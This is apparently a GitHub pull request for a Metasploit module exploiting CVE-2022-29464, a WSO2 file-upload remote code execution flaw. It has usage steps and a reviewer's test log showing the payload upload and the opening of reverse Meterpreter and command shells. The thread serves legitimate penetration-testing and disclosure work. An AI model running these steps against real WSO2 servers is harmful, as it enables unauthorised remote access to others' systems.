Add WSO2 file upload RCE module

[jheysel-r7]

Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a java/meterpreter/reverse_tcp payload inside a war file and uploads it to the target via the vulnerable file upload. It then executes the payload and receives a shell.

Verification

List the steps needed to make sure this thing works

• Install the application
• Start msfconsole
• Do: use multi/http/wso2_file_upload_rce
• Do: set rhosts [ip]
• Do: set lhost [ip]
• Do: run
• You should get a shell.

[wvu]

Hi, Jack!

[jheysel-r7]

Hi, Jack!

WILL!! Great to hear from you, I knew it wasn't bye forever 🎉

[smcintyre-r7]

@msjenkins-r7 test this please.

[smcintyre-r7]

Module is working great! The check method looks alot better now and the exponential backoff means I'm getting my shells alot faster. I tested both a Java Meterpreter and Java Shell payload. Everything worked perfectly. I'll get this landed in a moment.

Testing Output

msf6 exploit(multi/http/wso2_file_upload_rce) > show options 

Module options (exploit/multi/http/wso2_file_upload_rce):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             9443             yes       The target port (TCP)
   SSL               true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Relative URI of WSO2 product installation
   VHOST                              no        HTTP server virtual host
   WAR_DEPLOY_DELAY  20               yes       How long to wait for the war file to deploy, in seconds


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Dropper


msf6 exploit(multi/http/wso2_file_upload_rce) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(multi/http/wso2_file_upload_rce) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(multi/http/wso2_file_upload_rce) > check
[*] 192.168.159.128:9443 - The target appears to be vulnerable.
msf6 exploit(multi/http/wso2_file_upload_rce) > edit
msf6 exploit(multi/http/wso2_file_upload_rce) > exploit
msf6 exploit(multi/http/wso2_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[+] Payload executed successfully
[*] Sending stage (58851 bytes) to 192.168.159.128
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.128:60720 ) at 2022-04-29 09:55:35 -0400

meterpreter > getuid
Server username: smcintyre
meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 5.17.4-100.fc34.x86_64 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.128 - Meterpreter session 1 closed.  Reason: User exit
[*] 192.168.159.128 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(multi/http/wso2_file_upload_rce) > set PAYLOAD java/
set PAYLOAD java/jsp_shell_bind_tcp         set PAYLOAD java/meterpreter/bind_tcp       set PAYLOAD java/meterpreter/reverse_https  set PAYLOAD java/shell/bind_tcp             set PAYLOAD java/shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp      set PAYLOAD java/meterpreter/reverse_http   set PAYLOAD java/meterpreter/reverse_tcp    set PAYLOAD java/shell/reverse_tcp          
msf6 exploit(multi/http/wso2_file_upload_rce) > set PAYLOAD java/shell/reverse_tcp 
PAYLOAD => java/shell/reverse_tcp
msf6 exploit(multi/http/wso2_file_upload_rce) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[+] Payload executed successfully
[*] Sending stage (2952 bytes) to 192.168.159.128
[*] Command shell session 2 opened (192.168.159.128:4444 -> 192.168.159.128:60722 ) at 2022-04-29 09:56:25 -0400

id
uid=1000(smcintyre) gid=1000(smcintyre) groups=1000(smcintyre),10(wheel),973(docker),975(wireshark)
pwd
/home/smcintyre/Downloads/wso2am-4.0.0
exit
[*] 192.168.159.128 - Command shell session 2 closed.
msf6 exploit(multi/http/wso2_file_upload_rce) >

[smcintyre-r7]

Release Notes

This adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution.